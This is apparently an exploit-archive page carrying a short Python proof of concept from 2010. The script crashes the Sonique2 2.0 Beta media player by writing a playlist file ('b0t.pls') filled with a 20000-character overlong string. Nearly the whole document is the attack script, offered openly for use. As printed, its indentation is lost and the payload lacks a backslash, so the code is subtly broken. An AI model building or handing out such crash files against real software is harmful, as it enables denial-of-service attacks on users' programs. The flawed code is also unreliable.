[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sonique2 v2.0 Beta Build 103 Local Crash PoC
# Published : 2010-01-23
# Author : b0telh0
# Previous Title : P2GChinchilla HTTP Server v1.1.1 Denial Of Service Exploit
# Next Title : yPlay 1.0.76 (.mp3) Local Crash PoC
#!/usr/bin/python
#
# Title: Sonique2 2.0 Beta Build 103 Local Crash PoC
# Found by: b0telh0
# Tested on: Windows XP SP3
crash = "x41" * 20000
try:
file = open('b0t.pls','w');
file.write(crash);
file.close();
print "[+] Created b0t.pls file."
except:
print "[-] Error cant write file to system."